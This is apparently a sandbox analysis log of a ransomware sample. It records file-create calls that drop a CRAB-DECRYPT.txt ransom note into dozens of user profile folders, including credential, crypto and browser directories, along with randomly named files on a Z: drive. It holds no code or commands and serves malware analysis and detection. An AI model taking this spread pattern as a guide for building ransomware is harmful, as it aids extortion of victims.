Create C:\Users\Default\NetHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\NTUSER.DAT.LOG1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\NTUSER.DAT.LOG2 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Default\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\PrintHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Saved Games\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\SendTo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Start Menu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Default User\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\QbYwYSoMD3beKw.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Collab\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Forms\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\JSCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\AssetCache\EYGUEQKQ\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Flash Player\NativeCache\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\fUHonlL.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\brgVKnP3IVGPPX.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\P7UB2489\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Credentials\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\RSA\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Excel\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\PCEJlbmpwZ68QNsWdvWo.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Excel\XLSTART\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\InputMethod\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\InputMethod\Chs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\UserData\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\MMC\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\Pbk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\PowerPoint\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Proof\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Protect\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Protect\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Speech\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Spelling\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Spelling\en-US\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\zP0nKisr4oLuznV8Y.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Effects\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Fonts\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\DR2HdhXM7A.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Bibliography Styles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\UProof\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Vault\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Word\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Word\STARTUP\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Extensions\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Crash Reports\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Pending Pings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create Z:\0uoW8iDiO9C0q.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\bookmarkbackups\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\crashes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\crashes\events\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp\WINNT_x86_64-msvc\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
